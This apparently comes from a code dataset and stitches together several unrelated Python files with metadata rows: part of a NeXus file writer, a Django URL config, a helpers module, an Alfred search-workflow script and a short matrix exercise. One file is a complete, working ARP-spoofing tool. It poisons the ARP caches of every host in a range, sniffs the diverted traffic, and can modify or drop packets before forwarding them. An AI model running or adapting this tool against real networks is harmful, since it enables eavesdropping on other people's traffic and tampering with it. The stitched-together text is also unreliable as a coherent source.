nexus_file.close()
def _write_links(self, file_root: Union[h5py.Group, Dict]):
for hard_link in self._hard_links:
self._writer.add_hard_link(file_root, hard_link.new_path,
hard_link.target_path)
for soft_link in self._soft_links:
self._writer.add_soft_link(file_root, soft_link.new_path,
soft_link.target_path)
def _write_sample(self, parent_group: Union[h5py.Group, Dict]):
for sample in self._sample:
sample_group = self._create_nx_class(sample.name, "NXsample", parent_group)
if sample.depends_on is not None:
depends_on = self._add_transformations_to_file(
sample.depends_on, sample_group, f"/entry/{sample.name}")
self._writer.add_dataset(sample_group, "depends_on", data=depends_on)
if sample.distance is not None:
distance_ds = self._writer.add_dataset(sample_group,
"distance",
data=sample.distance)
if sample.distance_units is not None:
self._writer.add_attribute(distance_ds, "units",
sample.distance_units)
if sample.ub_matrix is not None:
self._writer.add_dataset(sample_group,
"ub_matrix",
data=sample.ub_matrix)
if sample.orientation_matrix is not None:
self._writer.add_dataset(sample_group,
"orientation_matrix",
data=sample.orientation_matrix)
def _write_source(self, parent_group: Union[h5py.Group, Dict]):
for source in self._source:
source_group = self._create_nx_class(source.name, "NXsource", parent_group)
if source.depends_on is not None:
if isinstance(source.depends_on, str):
depends_on = source.depends_on
else:
depends_on = self._add_transformations_to_file(
source.depends_on, source_group, f"/entry/{source.name}")
self._writer.add_dataset(source_group, "depends_on", data=depends_on)
if source.distance is not None:
distance_ds = self._writer.add_dataset(source_group,
"distance",
data=source.distance)
if source.distance_units is not None:
self._writer.add_attribute(distance_ds, "units",
source.distance_units)
def _write_instrument(
self, parent_group: Union[h5py.Group, Dict]) -> Union[h5py.Group, Dict]:
instrument_group = self._create_nx_class("instrument", "NXinstrument",
parent_group)
self._writer.add_dataset(instrument_group, "name", self._instrument_name)
return instrument_group
def _write_detectors(self, parent_group: Union[h5py.Group, Dict], parent_path: str):
for detector_index, detector in enumerate(self._detectors):
detector_name = f"detector_{detector_index}"
detector_group = self._add_detector_group_to_file(
detector, parent_group, detector_name)
if detector.event_data is not None:
self._add_event_data_group_to_file(detector.event_data, detector_group,
"events")
if detector.log is not None:
self._add_log_group_to_file(detector.log, detector_group)
if detector.depends_on is not None:
depends_on = self._add_transformations_to_file(
detector.depends_on, detector_group,
f"{parent_path}/{detector_name}")
self._writer.add_dataset(detector_group, "depends_on", data=depends_on)
def _write_choppers(self, parent_group: Union[h5py.Group, Dict]):
for chopper in self._choppers:
chopper_group = self._create_nx_class(chopper.name, "NXdisk_chopper",
parent_group)
distance_ds = self._writer.add_dataset(chopper_group,
"distance",
data=chopper.distance)
rotation_ds = self._writer.add_dataset(chopper_group,
"rotation_speed",
data=chopper.rotation_speed)
if chopper.distance_units is not None:
self._writer.add_attribute(distance_ds, "units", chopper.distance_units)
if chopper.rotation_units is not None:
self._writer.add_attribute(rotation_ds, "units", chopper.rotation_units)
def _write_event_data(self, parent_group: Union[h5py.Group, Dict]):
for event_data_index, event_data in enumerate(self._event_data):
self._add_event_data_group_to_file(event_data, parent_group,
f"events_{event_data_index}")
def _write_monitors(self, parent_group: Union[h5py.Group, Dict]):
for monitor in self._monitors:
self._add_monitor_group_to_file(monitor, parent_group)
def _add_monitor_group_to_file(self, monitor: Monitor, parent_group: h5py.Group):
monitor_group = self._create_nx_class(monitor.name, "NXmonitor", parent_group)
data_group = self._writer.add_dataset(monitor_group, "data", monitor.data)
self._writer.add_attribute(data_group, "axes",
",".join(name for name, _ in monitor.axes))
if monitor.events:
self._write_event_data_to_group(monitor_group, monitor.events)
for axis_name, axis_data in monitor.axes:
# We write event data (if exists) first - if we've already written event
# data the event index will already have been created so we skip writing
# it here.
if not monitor.events or not axis_name == "event_index":
self._writer.add_dataset(monitor_group, axis_name, axis_data)
def _write_logs(self, parent_group: Union[h5py.Group, Dict]):
for log in self._logs:
self._add_log_group_to_file(log, parent_group)
def _add_event_data_group_to_file(self, data: EventData, parent_group: h5py.Group,
group_name: str):
event_group = self._create_nx_class(group_name, "NXevent_data", parent_group)
self._write_event_data_to_group(event_group, data)
def _write_event_data_to_group(self, event_group: h5py.Group, data: EventData):
if data.event_id is not None:
self._writer.add_dataset(event_group, "event_id", data=data.event_id)
if data.event_time_offset is not None:
event_time_offset_ds = self._writer.add_dataset(event_group,
"event_time_offset",
data=data.event_time_offset)
self._writer.add_attribute(event_time_offset_ds, "units",
data.event_time_offset_unit)
if data.event_time_zero is not None:
event_time_zero_ds = self._writer.add_dataset(event_group,
"event_time_zero",
data=data.event_time_zero)
self._writer.add_attribute(event_time_zero_ds, "units",
data.event_time_zero_unit)
self._writer.add_attribute(event_time_zero_ds, "offset",
data.event_time_zero_offset)
if data.event_index is not None:
self._writer.add_dataset(event_group, "event_index", data=data.event_index)
def _add_transformations_to_file(self, transform: Transformation,
parent_group: h5py.Group, parent_path: str) -> str:
transform_chain = [transform]
while transform.depends_on is not None and not isinstance(
transform.depends_on, str):
transform_chain.append(transform.depends_on)
transform = transform.depends_on
transforms_group_name = "transformations"
transforms_group = self._create_nx_class("transformations", "NXtransformations",
parent_group)
transform_chain.reverse()
depends_on_str = transform.depends_on if isinstance(transform.depends_on,
str) else None
transform_group_path = f"{parent_path}/{transforms_group_name}"
for transform_number, transform in enumerate(transform_chain):
if transform.time is not None:
depends_on_str = self._add_transformation_as_log(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
else:
depends_on_str = self._add_transformation_as_dataset(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
return depends_on_str
def _add_transformation_as_dataset(self, transform: Transformation,
transform_number: int,
transforms_group: h5py.Group, group_path: str,
depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._writer.add_dataset(transforms_group,
f"transform_{transform_number}",
data=transform.value)
self._add_transform_attributes(added_transform, depends_on, transform)
if transform.value_units is not None:
self._writer.add_attribute(added_transform, "units", transform.value_units)
return f"{group_path}/{transform_name}"
def _add_log_group_to_file(self, log: Log, parent_group: h5py.Group) -> h5py.Group:
log_group = self._create_nx_class(log.name, "NXlog", parent_group)
if log.value is not None:
value_ds = self._writer.add_dataset(log_group, "value", log.value)
if log.value_units is not None:
self._writer.add_attribute(value_ds, "units", log.value_units)
if log.time is not None:
time_ds = self._writer.add_dataset(log_group, "time", data=log.time)
if log.time_units is not None:
self._writer.add_attribute(time_ds, "units", log.time_units)
if log.start_time is not None:
self._writer.add_attribute(time_ds, "start", log.start_time)
if log.scaling_factor is not None:
self._writer.add_attribute(time_ds, "scaling_factor",
log.scaling_factor)
return log_group
def _add_transformation_as_log(self, transform: Transformation,
transform_number: int, transforms_group: h5py.Group,
group_path: str, depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._add_log_group_to_file(
Log(transform_name, transform.value, transform.time, transform.value_units,
transform.time_units), transforms_group)
self._add_transform_attributes(added_transform, depends_on, transform)
return f"{group_path}/{transform_name}"
def _add_detector_group_to_file(self, detector: Detector, parent_group: h5py.Group,
group_name: str) -> h5py.Group:
detector_group = self._create_nx_class(group_name, "NXdetector", parent_group)
if detector.detector_numbers is not None:
self._writer.add_dataset(detector_group, "detector_number",
detector.detector_numbers)
for dataset_name, array in (("x_pixel_offset", detector.x_offsets),
("y_pixel_offset", detector.y_offsets),
("z_pixel_offset", detector.z_offsets)):
if array is not None:
offsets_ds = self._writer.add_dataset(detector_group, dataset_name,
array)
if detector.offsets_unit is not None:
self._writer.add_attribute(offsets_ds, "units",
detector.offsets_unit)
return detector_group
def _add_transform_attributes(self, added_transform: Union[h5py.Group,
h5py.Dataset],
depends_on: Optional[str], transform: Transformation):
self._writer.add_attribute(added_transform, "vector", transform.vector)
self._writer.add_attribute(added_transform, "transformation_type",
transform.transform_type.value)
if transform.offset is not None:
self._writer.add_attribute(added_transform, "offset", transform.offset)
if depends_on is not None:
self._writer.add_attribute(added_transform, "depends_on", depends_on)
else:
self._writer.add_attribute(added_transform, "depends_on",
".") # means end of chain
def _create_nx_class(self, group_name: str, nx_class_name: str,
parent: h5root) -> h5py.Group:
nx_class = self._writer.add_group(parent, group_name)
self._writer.add_attribute(nx_class, "NX_class", nx_class_name)
return nx_class
def _write_streams(self, root: Union[h5py.File, Dict]):
if isinstance(self._writer, JsonWriter):
for stream in self._streams:
self._writer.add_stream(root, stream)
| 41.773936 | 88 | 0.61046 | 3,706 | 31,414 | 4.886131 | 0.09606 | 0.030373 | 0.035178 | 0.027612 | 0.434725 | 0.357742 | 0.313397 | 0.262591 | 0.21173 | 0.151811 | 0 | 0.00595 | 0.299166 | 31,414 | 751 | 89 | 41.829561 | 0.816543 | 0.068441 | 0 | 0.223729 | 0 | 0 | 0.05033 | 0.008876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.10339 | false | 0.00339 | 0.013559 | 0.00339 | 0.277966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c41032c50ef5d1788dcc18837fdc341819e52a | 10,351 | py | Python | pyarpspoofer/arpspoofer.py | bocajspear1/pyarpspoofer | 5612e0c900c070d98743bb8fdd39743a0ce09cf2 | [
"MIT"
] | null | null | null | pyarpspoofer/arpspoofer.py | bocajspear1/pyarpspoofer | 5612e0c900c070d98743bb8fdd39743a0ce09cf2 | [
"MIT"
] | null | null | null | pyarpspoofer/arpspoofer.py | bocajspear1/pyarpspoofer | 5612e0c900c070d98743bb8fdd39743a0ce09cf2 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2018 Jacob Hartman
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
import threading
import time
import copy
from scapy.all import *
import ipaddress
def is_python_2():
return sys.version_info[0] == 2
if is_python_2():
import Queue as queue
else:
import queue
class SniffThread (threading.Thread):
def __init__(self, interface, out_queue, filter=""):
threading.Thread.__init__(self)
self._queue = out_queue
self._filter = filter
self._interface = interface
self.daemon = True
self._stop = False
def sniff(self, pkt):
self._queue.put(pkt)
def is_stopping(self, pkt):
return self._stop
def run(self):
sniff(prn=self.sniff, store=0, iface=self._interface, filter=self._filter, stop_filter=self.is_stopping)
print("done")
def stop_sniffing(self):
self._stop = True
class ArpRequestPoisoner(threading.Thread):
def __init__(self, mac, interface, ip_map, free_ip, incr=2):
threading.Thread.__init__(self)
self.daemon = True
self._mac = mac
self._interface = interface
self._ip_map = ip_map
self._incr = incr
self._running = True
self._free_ip = free_ip
def stop_poison(self):
self._running = False
def run(self):
# Poisoning
while self._running:
for ip in self._ip_map:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, hwsrc=self._mac, pdst=self._free_ip, psrc=ip)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
print("ArpRequestPoisoner stopped, re-arping...")
# Re-arping clients
for i in range(3):
for ip in self._ip_map:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._ip_map[ip], type=0x806)/ARP(op=1, hwsrc=self._ip_map[ip], pdst=self._free_ip, psrc=ip)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
for i in range(3):
for ip in self._ip_map:
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, hwsrc=self._mac, pdst=ip, psrc=self._free_ip)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
class ArpResponsePoisoner(threading.Thread):
def __init__(self, mac, interface, ip_map, incr=2):
threading.Thread.__init__(self)
self.daemon = True
self._mac = mac
self._interface = interface
self._ip_map = ip_map
self._incr = incr
self._running = True
def stop_poison(self):
self._running = False
def run(self):
# Poisoning
while self._running:
for sender_ip in self._ip_map:
for resp_ip in self._ip_map:
arp_frame = Ether(
dst=self._ip_map[sender_ip],
src=self._mac,
type=0x806)/ARP(
op=2,
pdst=sender_ip,
hwdst=self._ip_map[sender_ip],
psrc=resp_ip,
hwsrc=self._mac)
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
print("ArpResponsePoisoner stopped, re-arping...")
# Re-arping clients
for i in range(3):
for sender_ip in self._ip_map:
for resp_ip in self._ip_map:
arp_frame = Ether(
dst=self._ip_map[sender_ip],
src=self._ip_map[resp_ip],
type=0x806)/ARP(
op=2,
pdst=sender_ip,
hwdst=self._ip_map[sender_ip],
psrc=resp_ip,
hwsrc=self._ip_map[resp_ip])
sendp(arp_frame, iface=self._interface, verbose=0)
time.sleep(self._incr)
class PacketIntercept(threading.Thread):
def __init__(self, mac_address, ip_address, interface, ip_map, on_packet):
threading.Thread.__init__(self)
self._on_packet = on_packet
self._mac = mac_address
self._interface = interface
self._ip_map = ip_map
self._ip = ip_address
self._running = True
self._pkt_queue = queue.Queue()
def stop_processing(self):
self._running = False
self._pkt_queue.put(None)
def run(self):
on_packet_sniff = SniffThread(self._interface, self._pkt_queue, "not arp and not host " + str(self._ip) + " and ether host " + self._mac)
on_packet_sniff.start()
while self._running:
pkt = self._pkt_queue.get()
if pkt and Ether in pkt and pkt.dst == self._mac and pkt.src != self._mac:
if self._on_packet:
send_pkt = self._on_packet(copy.deepcopy(pkt))
else:
send_pkt = pkt
# False means to drop the packet
if send_pkt:
if Ether in send_pkt and IP in send_pkt and send_pkt[IP].dst in self._ip_map:
send_ip = send_pkt[IP].dst
send_pkt[Ether].dst = self._ip_map[send_ip]
send_pkt[Ether].src = self._mac
sendp(send_pkt, iface=self._interface, verbose=0)
on_packet_sniff.stop_sniffing()
class ArpSpoofer():
def __init__(self, network_address, interface, mac_address, ip_address):
self._target_addresses = []
# Check for a range
if "-" in network_address:
parts = network_address.split("-")
start_ip = ipaddress.ip_address(parts[0])
last_octet = int(start_ip.exploded.split(".")[3])
range_end = int(parts[1])
counter = last_octet
offset = 0
while counter <= range_end:
self._target_addresses.append(start_ip+offset)
counter += 1
offset += 1
# Assume its a network with a mask
else:
network_address = None
if is_python_2():
network_address = ipaddress.ip_network(unicode(network_address))
else:
network_address = ipaddress.ip_network(network_address)
for host in network_address.hosts():
self._target_addresses.append(host)
# Parse the source IP
if is_python_2():
self._ip = ipaddress.ip_address(unicode(ip_address))
else:
self._ip = ipaddress.ip_address(ip_address)
self._interface = interface
self._mac = mac_address
self._on_intercept = None
self._mac_map = {}
self._ip_map = {}
self._pkt_queue = None
self._running = True
self._resp_poison = None
self._req_poison = None
def set_intercept(self, intercept_func):
self._on_intercept = intercept_func
def start_spoof(self, on_packet=None):
print("Building IP to MAC address map...")
arp_queue = queue.Queue()
arp_resp_sniff = SniffThread(self._interface, arp_queue, "arp")
arp_resp_sniff.start()
time.sleep(0.5)
all_hosts = []
for host in self._target_addresses:
if host == self._ip:
print("! - Skipping self at " + str(self._ip))
continue
arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac, type=0x806)/ARP(op=1, pdst=str(host), psrc=str(self._ip))
sendp(arp_frame, iface=self._interface, verbose=0)
all_hosts.append(host)
time.sleep(1)
arp_resp_sniff.stop_sniffing()
while not arp_queue.empty():
resp = arp_queue.get()
if ARP in resp and resp[ARP].op == 2:
self._mac_map[resp[ARP].hwsrc] = resp[ARP].psrc
self._ip_map[resp[ARP].psrc] = resp[ARP].hwsrc
free_ip = all_hosts[len(all_hosts)-1]
for host in self._target_addresses:
if str(host) not in self._ip_map:
free_ip = str(host)
break
print("Mapping complete...")
self._req_poison = ArpRequestPoisoner(self._mac, self._interface, self._ip_map, free_ip)
self._req_poison.start()
self._resp_poison = ArpResponsePoisoner(self._mac, self._interface, self._ip_map)
self._resp_poison.start()
print("Intercepting packets...")
self._intecept = PacketIntercept(self._mac, self._ip, self._interface, self._ip_map, on_packet)
self._intecept.start()
def stop_spoof(self):
print("Re-arping clients")
if self._resp_poison:
self._resp_poison.stop_poison()
self._resp_poison.join()
if self._req_poison:
self._req_poison.stop_poison()
self._req_poison.join()
print("Stopping intercept...")
if self._intecept:
self._intecept.stop_processing()
self._intecept.join()
| 34.274834 | 155 | 0.589025 | 1,315 | 10,351 | 4.364259 | 0.171863 | 0.035546 | 0.040774 | 0.016728 | 0.369228 | 0.306848 | 0.301795 | 0.268862 | 0.268862 | 0.239763 | 0 | 0.009074 | 0.318617 | 10,351 | 301 | 156 | 34.388704 | 0.804622 | 0.118636 | 0 | 0.386792 | 0 | 0 | 0.036232 | 0 | 0 | 0 | 0.003294 | 0 | 0 | 1 | 0.089623 | false | 0 | 0.037736 | 0.009434 | 0.160377 | 0.042453 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c515b10ccba3215103fa7169a17fded5d650d8 | 298 | py | Python | tests/test_app/urls.py | emorozov/django-reversion | 43b732b29b1023d984b3deb73b03c7d691db520d | [
"BSD-3-Clause"
] | 1,735 | 2015-01-01T17:57:11.000Z | 2022-03-28T10:53:27.000Z | tests/test_app/urls.py | emorozov/django-reversion | 43b732b29b1023d984b3deb73b03c7d691db520d | [
"BSD-3-Clause"
] | 554 | 2015-01-02T17:31:31.000Z | 2022-02-22T10:30:04.000Z | tests/test_app/urls.py | emorozov/django-reversion | 43b732b29b1023d984b3deb73b03c7d691db520d | [
"BSD-3-Clause"
] | 368 | 2015-01-02T03:32:18.000Z | 2022-03-31T09:48:31.000Z | from django.urls import path
from test_app import views
urlpatterns = [
path("save-obj/", views.save_obj_view),
path("save-obj-error/", views.save_obj_error_view),
path("create-revision/", views.create_revision_view),
path("revision-mixin/", views.RevisionMixinView.as_view()),
]
| 27.090909 | 63 | 0.724832 | 41 | 298 | 5.04878 | 0.439024 | 0.135266 | 0.10628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127517 | 298 | 10 | 64 | 29.8 | 0.796154 | 0 | 0 | 0 | 0 | 0 | 0.184564 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44cb0ba9c0f8df7004f8672416120408c2f977bc | 350 | py | Python | app/helpers.py | kilonzi/dukaone | 0563f1329f87df17424d6c058b46f6bdede46f2f | [
"MIT"
] | null | null | null | app/helpers.py | kilonzi/dukaone | 0563f1329f87df17424d6c058b46f6bdede46f2f | [
"MIT"
] | null | null | null | app/helpers.py | kilonzi/dukaone | 0563f1329f87df17424d6c058b46f6bdede46f2f | [
"MIT"
] | null | null | null | from db.models import *
def unpack_query_objects(objects) -> dict:
results = []
for object in objects:
results.append(object.to_dict())
return results
def stringify_object(object) -> dict:
str_obj = {}
object_dict = object.to_dict()
for i in object_dict.items():
str_obj[i[0]] = str(i[1])
return str_obj
| 23.333333 | 42 | 0.642857 | 50 | 350 | 4.3 | 0.46 | 0.139535 | 0.111628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007491 | 0.237143 | 350 | 14 | 43 | 25 | 0.797753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44cdc0c7246c968a7e2f2abbae018d1456bcdfd9 | 8,239 | py | Python | src/lib/searchio/cmd/reload.py | cgxxv/alfred-searchio | f4a14cbe5350b83d6d962aa993abf01f14b60d33 | [
"MIT"
] | 304 | 2015-01-15T08:18:47.000Z | 2022-03-31T10:41:52.000Z | src/lib/searchio/cmd/reload.py | cgxxv/alfred-searchio | f4a14cbe5350b83d6d962aa993abf01f14b60d33 | [
"MIT"
] | 66 | 2015-03-14T18:10:36.000Z | 2022-03-27T11:33:56.000Z | src/lib/searchio/cmd/reload.py | cgxxv/alfred-searchio | f4a14cbe5350b83d6d962aa993abf01f14b60d33 | [
"MIT"
] | 36 | 2015-04-12T16:50:17.000Z | 2022-03-28T09:53:32.000Z | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2016 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2016-12-17
#
"""searchio reload [-h]
Update info.plist from saved searches.
Usage:
searchio reload [--defaults]
searchio -h
Options:
-d, --defaults Use default searches, not user's.
-h, --help Display this help message.
"""
from __future__ import print_function, absolute_import
import json
import os
from plistlib import readPlist, readPlistFromString, writePlist
from docopt import docopt
from searchio.core import Context
from searchio.engines import Search
from searchio import util
log = util.logger(__name__)
# X position of all generated Script Filters
XPOS = 270
# Y position of first Script Filter
YPOS = 220
# Vertical space between (top of) each Script Filter
YOFFSET = 170
# UID of action to connect Script Filters to
OPEN_URL_UID = '1133DEAA-5A8F-4E7D-9E9C-A76CB82D9F92'
SCRIPT_FILTER = """
<dict>
<key>config</key>
<dict>
<key>alfredfiltersresults</key>
<false/>
<key>alfredfiltersresultsmatchmode</key>
<integer>0</integer>
<key>argumenttrimmode</key>
<integer>0</integer>
<key>argumenttype</key>
<integer>0</integer>
<key>escaping</key>
<integer>102</integer>
<key>keyword</key>
<string>g</string>
<key>queuedelaycustom</key>
<integer>3</integer>
<key>queuedelayimmediatelyinitially</key>
<false/>
<key>queuedelaymode</key>
<integer>0</integer>
<key>queuemode</key>
<integer>2</integer>
<key>runningsubtext</key>
<string>Fetching results…</string>
<key>script</key>
<string>./searchio search google-en "$1"</string>
<key>scriptargtype</key>
<integer>1</integer>
<key>scriptfile</key>
<string></string>
<key>subtext</key>
<string>Searchio!</string>
<key>title</key>
<string>Google Search (English)</string>
<key>type</key>
<integer>0</integer>
<key>withspace</key>
<true/>
</dict>
<key>type</key>
<string>alfred.workflow.input.scriptfilter</string>
<key>uid</key>
<string>18E144DF-1054-4A12-B5F0-AC05C6F7DEFD</string>
<key>version</key>
<integer>2</integer>
</dict>
"""
# Default search engines
DEFAULTS = [
{
'title': 'Google (English)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'g',
'search_url': 'https://www.google.com/search?q={query}&hl=en&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=en',
'uid': 'google-en',
},
{
'title': 'Google (Deutsch)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'gd',
'search_url': 'https://www.google.com/search?q={query}&hl=de&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=de',
'uid': 'google-de',
},
{
'title': 'Wikipedia (English)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'w',
'search_url': 'https://en.wikipedia.org/wiki/{query}',
'suggest_url': 'https://en.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-en',
},
{
'title': 'Wikipedia (Deutsch)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'wd',
'search_url': 'https://de.wikipedia.org/wiki/{query}',
'suggest_url': 'https://de.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-de',
},
{
'title': 'YouTube (United States)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'yt',
'search_url': 'https://www.youtube.com/results?gl=us&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=us&q={query}',
'uid': 'youtube-us',
},
{
'title': 'YouTube (Germany)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'ytd',
'search_url': 'https://www.youtube.com/results?gl=de&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=de&q={query}',
'uid': 'youtube-de',
},
]
def usage(wf=None):
"""CLI usage instructions."""
return __doc__
def remove_script_filters(wf, data):
"""Remove auto-generated Script Filters from info.plist data."""
ids = set()
for k, d in data['uidata'].items():
if 'colorindex' not in d:
ids.add(k)
keep = []
delete = []
for obj in data['objects']:
if obj['uid'] in ids and \
obj['type'] == 'alfred.workflow.input.scriptfilter':
log.info('Removed Script Filter "%s" (%s)',
obj['config']['title'], obj['uid'])
delete.append(obj['uid'])
continue
keep.append(obj)
data['objects'] = keep
# Remove connections and uidata
for uid in delete:
del data['connections'][uid]
del data['uidata'][uid]
def add_script_filters(wf, data, searches=None):
"""Add user searches to info.plist data."""
ctx = Context(wf)
only = set()
if searches: # add them to the user's searches dir
for s in searches:
path = os.path.join(ctx.searches_dir, s.uid + '.json')
with open(path, 'wb') as fp:
json.dump(s.dict, fp)
only.add(s.uid)
log.info('Saved search "%s"', s.title)
f = util.FileFinder([ctx.searches_dir], ['json'])
searches = [Search.from_file(p) for p in f]
if only:
searches = [s for s in searches if s.uid in only]
searches.sort(key=lambda s: s.title)
ypos = YPOS
for s in searches:
if not s.keyword:
log.error('No keyword for search "%s" (%s)', s.title, s.uid)
continue
d = readPlistFromString(SCRIPT_FILTER)
d['uid'] = s.uid
d['config']['title'] = s.title
# d['config']['script'] = './searchio search {} "$1"'.format(s.uid)
d['config']['script'] = './search {} "$1"'.format(s.uid)
d['config']['keyword'] = s.keyword
data['objects'].append(d)
data['connections'][s.uid] = [{
'destinationuid': OPEN_URL_UID,
'modifiers': 0,
'modifiersubtext': '',
'vitoclose': False,
}]
data['uidata'][s.uid] = {
'note': s.title,
'xpos': XPOS,
'ypos': ypos,
}
ypos += YOFFSET
log.info('Added Script Filter "%s" (%s)', s.title, s.uid)
link_icons(wf, searches)
def link_icons(wf, searches):
"""Create symlinks for Script Filter icons."""
# Remove existing icon symlinks
for fn in os.listdir(wf.workflowdir):
if not fn.endswith('.png'):
continue
p = wf.workflowfile(fn)
if not os.path.islink(p):
continue
os.unlink(p)
log.debug('Removed search icon "%s"', p)
for s in searches:
src = s.icon
dest = wf.workflowfile(s.uid + '.png')
if os.path.exists(dest):
continue
src = os.path.relpath(src, wf.workflowdir)
dest = os.path.relpath(dest, wf.workflowdir)
log.debug('Linking "%s" to "%s"', src, dest)
os.symlink(src, dest)
def run(wf, argv):
"""Run ``searchio reload`` sub-command."""
args = docopt(usage(wf), argv)
searches = None
log.debug('args=%r', args)
if args['--defaults']:
searches = [Search.from_dict(d) for d in DEFAULTS]
ip = wf.workflowfile('info.plist')
data = readPlist(ip)
remove_script_filters(wf, data)
add_script_filters(wf, data, searches)
writePlist(data, ip)
| 29.320285 | 112 | 0.572157 | 993 | 8,239 | 4.699899 | 0.266868 | 0.02057 | 0.02057 | 0.019284 | 0.281766 | 0.236555 | 0.218556 | 0.192843 | 0.141847 | 0.141847 | 0 | 0.013266 | 0.258891 | 8,239 | 280 | 113 | 29.425 | 0.750573 | 0.115305 | 0 | 0.17619 | 0 | 0.047619 | 0.462771 | 0.090897 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.038095 | 0 | 0.066667 | 0.004762 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d22b17f45772c546f11f4444520b63362e9cd5 | 766 | py | Python | slide_09/Exercicio04.py | lordjack/aula_python_slides | 38ad45ac1843fc83c3349addb9d49f7d182a574f | [
"MIT"
] | null | null | null | slide_09/Exercicio04.py | lordjack/aula_python_slides | 38ad45ac1843fc83c3349addb9d49f7d182a574f | [
"MIT"
] | null | null | null | slide_09/Exercicio04.py | lordjack/aula_python_slides | 38ad45ac1843fc83c3349addb9d49f7d182a574f | [
"MIT"
] | null | null | null | '''
Q04 - Faça um programa que leia uma matriz 3x3 de inteiros,
e apresente a Diagonal Principal desta Matriz.
'''
import random
# x = random.uniform(0, 10)
matriz = []
diagonalPrincipal = []
for i in range(0, 3, 1):
linha = []
